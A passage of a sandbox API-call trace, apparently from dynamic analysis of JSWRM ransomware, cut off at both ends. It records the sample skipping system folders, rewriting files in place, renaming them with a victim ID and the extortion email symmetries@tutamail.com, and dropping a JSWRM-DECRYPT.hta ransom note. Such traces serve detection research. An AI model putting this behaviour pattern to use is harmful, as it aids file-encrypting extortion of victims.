CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0058.689] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.689] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3726) returned 1 [0058.689] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe80) returned 0x23dc88 [0058.690] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xe80, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xe80, lpOverlapped=0x0) returned 1 [0058.691] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.691] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xe80, lpOverlapped=0x0) returned 1 [0058.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0058.691] CloseHandle (hObject=0x3d4) returned 1 [0058.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0058.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0058.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0058.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0058.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0058.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0058.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0058.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0058.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.692] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0058.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0058.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0058.693] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a4ada6, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19a4ada6, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19a4ada6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0058.693] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0058.693] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0058.693] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0058.693] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0058.693] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0058.693] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0058.693] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0058.693] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0058.693] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0058.693] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0058.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0058.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0058.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0058.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0058.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.694] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.694] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0058.694] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0058.694] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0058.694] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0058.694] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0058.694] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0058.694] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0058.694] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0058.694] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0058.694] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0058.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0058.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0058.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0058.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0058.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0058.695] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.695] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=80970) returned 1 [0058.695] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13c40) returned 0x2471a8 [0058.695] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x13c40, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x13c40, lpOverlapped=0x0) returned 1 [0058.702] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.702] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x13c40, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x13c40, lpOverlapped=0x0) returned 1 [0058.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.703] CloseHandle (hObject=0x3d4) returned 1 [0058.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0058.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0058.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0058.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0058.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0058.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0058.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0058.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0058.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.705] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0058.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0058.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0058.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0058.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0058.705] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0058.706] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0058.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0058.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241178, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0058.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0058.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0058.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0058.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0058.706] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.706] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0058.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0058.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0058.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.707] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1030", cAlternateFileName="")) returned 1 [0058.707] lstrcmpiW (lpString1="1030", lpString2=".") returned 1 [0058.707] lstrcmpiW (lpString1="1030", lpString2="..") returned 1 [0058.707] lstrcmpiW (lpString1="1030", lpString2="...") returned 1 [0058.707] lstrcmpiW (lpString1="1030", lpString2="windows") returned -1 [0058.707] lstrcmpiW (lpString1="1030", lpString2="recovery") returned -1 [0058.707] lstrcmpiW (lpString1="1030", lpString2="perflogs") returned -1 [0058.707] lstrcmpiW (lpString1="1030", lpString2="documents and settings") returned -1 [0058.707] lstrcmpiW (lpString1="1030", lpString2="$RECYCLE.BIN") returned 1 [0058.707] lstrcmpiW (lpString1="1030", lpString2="system volume information") returned -1 [0058.707] lstrcmpiW (lpString1="1030", lpString2="msocache") returned -1 [0058.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0058.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0058.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0058.707] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1030\\jswrm-decrypt.hta")) returned 0xffffffff [0058.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0058.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0058.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0058.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0058.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0058.750] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0058.750] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1030\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0058.753] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.753] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0058.754] CloseHandle (hObject=0x450) returned 1 [0058.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0058.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 